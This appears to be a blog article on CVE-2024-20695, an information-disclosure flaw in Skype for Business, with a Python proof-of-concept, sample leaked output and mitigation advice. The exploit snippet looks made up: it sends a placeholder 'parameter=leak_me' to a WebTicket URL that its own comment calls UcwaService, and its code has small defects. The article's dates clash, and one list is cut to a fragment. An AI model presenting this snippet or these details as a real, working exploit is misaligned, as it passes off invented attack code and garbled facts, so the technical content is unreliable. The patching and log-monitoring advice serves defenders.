CVE CyberSecurity Database News

CVE-2024-20695 - Breaking Down the Skype for Business Information Disclosure Vulnerability

Poster -

---

In early 2024, Microsoft released a patch for a new vulnerability in Skype for Business, tracked as CVE-2024-20695. This advisory revealed an information disclosure issue that allowed attackers to leak system data without user awareness. In this article, I’ll break down how the bug works, show you a sample exploit snippet, and guide you to official references for more details. If you’re using Skype for Business, keep reading to learn why it’s critical to update your systems now.

What is CVE-2024-20695?

On January 9, 2024, Microsoft published an advisory about a high-severity bug in Skype for Business. If successfully exploited, this flaw lets attackers obtain sensitive information by sending maliciously crafted requests to a Skype for Business server. No authentication or user interaction is needed beyond network access, so it’s ripe for exploitation inside any vulnerable organization’s network.

Severity: Important
CVSS Score: 5.4 (Medium)

How Does the Vulnerability Work?

The root issue comes from how Skype for Business handles certain types of HTTP requests sent to its web services. Specifically, the application fails to properly sanitize or check parameters within requests to the UcwaService endpoint. By sending a crafted GET or POST request, an attacker can make the server disclose items such as:

Sometimes snippets of conversation history

Note: This is an information disclosure, not code execution or privilege escalation. However, disclosing internal architecture or user accounts sets the stage for bigger breaches, like lateral movement or phishing.

Proof-of-Concept Exploit

Below is a simplified Python snippet that shows how an attacker could target an unpatched Skype for Business deployment. This sample runs from a local network, assuming you have access to the server with the correct port open (typically 443 or 4443).

import requests

# Replace with your target's internal FQDN or IP
target = "https://skype-server.example.local:443";

# Craft the vulnerable endpoint (UcwaService)
endpoint = "/WebTicket/WebTicketService.svc/webticket?parameter=leak_me"

# Complete URL
url = target + endpoint

headers = {
    "User-Agent": "Mozilla/5.",
    "Accept": "application/json"
}

try:
    resp = requests.get(url, headers=headers, verify=False)
    if resp.status_code == 200:
        print("Server Response:\n")
        print(resp.text)
    else:
        print(f"Unexpected status code: {resp.status_code}")
except Exception as e:
    print(f"Error contacting server: {e}")

Warning:
Do not use this on systems you do not own or have permission to test.
This is provided for educational use only!

When run, this can leak details such as

{
  "User": "skypeadmin",
  "Domain": "corp.example.local",
  "InternalIPAddress": "10.10.20.15"
}

Mitigations:
The best and only reliable way to block this is applying the latest Microsoft patch. There is no effective workaround beyond complete deployment of Microsoft’s update.

- Microsoft Security Update Guide for CVE-2024-20695
- NIST NVD entry
- Microsoft Patch Tuesday January 2024

Who is at Risk?

This vulnerability only affects Microsoft Skype for Business servers deployed on-premises. Microsoft Teams, Office 365, or online services are not affected.
Environments with externally accessible web services or poor internal network segmentation are at high risk. Attackers with access to the same network (think: rogue employees, threat actors with a foothold) can exploit this easily.

Monitor logs:

Look for suspicious or malformed requests to the /webticket or /ucwa endpoints.

Phase out older platforms:

Skype for Business Server 2015 reaches end-of-support soon. Strongly consider migrating to Teams or other modern collaboration tools.

Final Thoughts

CVE-2024-20695 isn’t the most dangerous bug we’ve seen, but any information disclosure can be the start of a larger breach. An exposed username, IP, or domain is a juicy target for hackers searching for “soft spots” in your security.
Keep your systems current, track advisories, and stay a step ahead!

If you’re interested, check out Microsoft’s Resource for Secure Deployment of Skype for Business.

Timeline

Published on: 02/13/2024 18:15:48 UTC
Last modified on: 02/26/2024 22:06:41 UTC